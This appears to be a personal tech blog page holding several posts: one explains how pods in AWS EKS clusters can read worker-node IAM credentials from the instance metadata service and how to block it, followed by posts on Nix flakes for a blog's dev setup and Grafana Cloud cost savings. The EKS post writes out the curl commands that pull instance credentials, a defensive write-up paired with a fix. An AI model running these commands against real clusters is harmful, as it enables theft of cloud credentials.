Skip to content

2026

AWS EKS vulnerability

Before we start, I must clarify that there are no newly discovered 0‑Day vulnerabilities in this blog post, but rather a moment of clarity realizing how bad an already‑existing unpatched (N‑Day) vulnerability can be under certain circumstances.

The vulnerability discussed here is that AWS EKS clusters (Kubernetes) by default allow pods to steal worker node credentials. This is bad, but the patch is relatively simple with few side effects. I will take you through how the vulnerability is exploited, an example of what would amplify the impact, how it is patched, and examples of what potentially breaks.

The exploit

When spinning up an AWS EKS cluster, depending on the method used, your worker nodes might end up with a launch template configuration that has the default hop limit of 2. This means that pods are allowed to call the instance metadata service, because two network hops are allowed. The instance metadata service is what the EC2 instance (worker node) uses to get information about itself and its environment, including credentials, and this is where our exploit begins. Assuming that you can gain access to the cluster's pods or spin up new ones, be careful if following this example because the credentials, even though temporary, might end up in your logs.

# Spin up a new pod with an interactive shell
kubectl run -n default -i --tty --rm debug --image=alpine:latest --restart=Never -- sh

# Install curl
apk update && apk add curl

# Get a token from the metadata service
curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"

We have now obtained a token from the metadata service that can be used to retrieve the EC2 instance role name and its credentials. Continuing in the same pod as before.

# Get the EC2 instance role name
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Get the EC2 instance role credentials
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/$ROLE

We have now obtained a valid set of AWS credentials with the same permission scope as your EC2 instance role.

The impact

It is very common for AWS EKS worker nodes to have access to pull container images or read data from SSM Parameter Store and probably more. In some environments where predictable naming patterns exist, decrypted access to certain secrets may still be possible even with limited list/describe permissions, which makes the impact more serious than initially expected. Some teams might prefer SSM Parameter Store for storing secrets over Secrets Manager, making the impact much worse.

The patch

To prevent pods from accessing the instance metadata service, set the EC2 instance metadata hop limit to 1 in your worker node launch templates. This blocks pod‑level IMDS access while keeping node‑level functionality intact. Be aware that some Kubernetes add‑ons or deployment tooling may rely on IMDS for cluster, network, or storage metadata. These components may need additional configuration, such as supplying explicit parameters or assigning dedicated IAM roles. The exact impact varies between setups, so it's important to evaluate this change in a non‑production environment first. Here are things I have discovered, but you might have more.

  • AWS Load Balancer Controller can no longer get the VPC ID, so we need to supply it.
  • EBS CSI driver will first attempt to call the metadata service for information, then fail, throwing an error and then falling back to getting it from Kubernetes instead.
  • Flux Image Reflector Controller can no longer pull images from ECR, so an IRSA role needs to be supplied.

Disclaimer: This example reflects a generic EKS configuration and is not indicative of any specific environment.

How this blog uses Nix

Nix is an advanced tool for building, packaging, and configuring software in a reliable, reproducible and declarative way, that has been gaining a lot of popularity over recent years. Nix first came up on my radar around the early 2020s, but it took a couple of years before I really started investing time on it other than just reading. It is really powerful but also very different from what I was used to. I now use NixOS as my daily driver (work and home) and use Nix Flakes to declare my development shells in various projects. In this post we will go over how I first started using Nix and how I have declared a development shell for this blog using Nix Flakes.

The word Nix is used everywhere

The term "I use Nix" can have many meanings and is sometimes confusing. Let's go over some of them here.

  • Nix the functional language
  • Nix the package manager also known as nixpkgs
  • Nix the operating system also known as NixOS

There are probably more, but I think this might illustrate where the confusion comes from. Just know that people tend to only use the word "Nix" and you have to guess the context.

Home-manager is a great place to start

I started my practical journey with Nix with porting my dotfiles and packages into the Nix ecosystem using Home-manager, a basic system for managing your user environment using the Nix package manager and Nix libraries. For me it was a great starting point and I can really recommend this approach. At that time I was using Archlinux, but Nix with home-manager could easily be set up on the side and I could slowly port my stuff when I felt like it. I also quickly found out that I almost don't have any system-level configuration, so I made the switch to NixOS after roughly a year and I have never looked back since. See my NixOS configuration here github.com/wcarlsen/config.

Flakes and development shells

Flakes have at this point basically become the defacto standard, when using Nix. It adds a much needed flake.lock file (can be updated with nix flake update), making sure your configuration is reproducable. It is pretty simple to define a development shell using flakes. See look at "minimal" example.

# flake.nix
{
  inputs = {
    nixpkgs.url = "github:nixos/nixpkgs/nixos-unstable";
    flake-utils.url = "github:numtide/flake-utils";
  };

  outputs = inputs:
    inputs.flake-utils.lib.eachDefaultSystem (system: let
      pkgs = import inputs.nixpkgs {
        inherit system;
      }; # this is just a fancy (but easy) way to define your system, e.g. x86_64-linux, aarch64_darwin, etc.
    in {
      devShells = {
        default = pkgs.mkShell {
          buildInputs = with pkgs; [
            cowsay # add your dependencies here
          ];
          shellHook = ``
            cowsay "COWABUNGA!" # add your custom shell hooks here
          ``;
        };
      };
    });
}

Above flake consists of inputs, defining which branch of the Nix package manager to use and flake-utils as a way to define systems. The other part is outputs, where we are outputting devShells, but only defining one called default using pkgs.mkShell and its attribute buildInputs to define package dependencies. It should be noted that mkShell has other attributes as well, for example shellHook. You could imagine a simple Python project using UV as package manager, where buildInputs would contain Python and UV and the shellHook running uv sync installing all Python-specific dependencies. Another example would be an Opentofu project, where we install all providers with tofu init in the shellHook.

The devShells can be invoked with the following nix command: nix develop. I tend to use direnv and just put use flake in my .envrc file, to have it automatically set up my development shell.

So how does this blog use Nix?

Now that we have some limited knowledge about Nix and Flakes, we can start looking at how this blog uses it. In the root of the GitHub project you will find a flake.nix which specifies MkDocs and all the plugins used to create this blog, and, because I use direnv, it will automatically install all dependencies and drop me into a development shell so I can start writing and validate my changes locally. I find the "holy trinity" flakes, direnv and make really useful. So now we have a reproducible development setup; how do we use it in places other than locally? Let's look at GitHub Actions as an example.

GitHub Actions and Flakes

Because we have defined all of our dependencies in a Flake it becomes really easy to utilize it in a GitHub Action.

name: build
on:
  pull_request:
    branches:
      - main
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Install Nix
        uses: cachix/install-nix-action@v30
        with:
          extra_nix_config: |
            access-tokens = github.com=${{ secrets.GITHUB_TOKEN }}
      - name: Build
        run: nix develop --command make build

We see that it doesn't really require much effort at all, and changes to my local development don't require updates to my GitHub Actions workflow (unless I change the Makefile interface).

Cost savings Grafana Cloud follow up

In the previous post I wrote about our efforts reduce cost for Grafana Cloud metrics. Here I went over the 3 main things we implemented

  • Reduced sample rates
  • Filter/drop unused metrics (keep only used ones)
  • Enable adaptive metrics

but I also ended up concluding that we lacked impact feedback and only had proxy indicators. Our goal was ambitious and more concrete we set out to save 80% on our metrics bill. This post serves as a conclusion on our efforts.

Conclusion

We now know that we almost reached that goal with a 78% reduction in metrics cost alone.

Implementation aftermath

Enabling auto-mode for adaptive metrics was by far the most invasive and we saw some of the developers dashboards break, but also fewer than antisipated.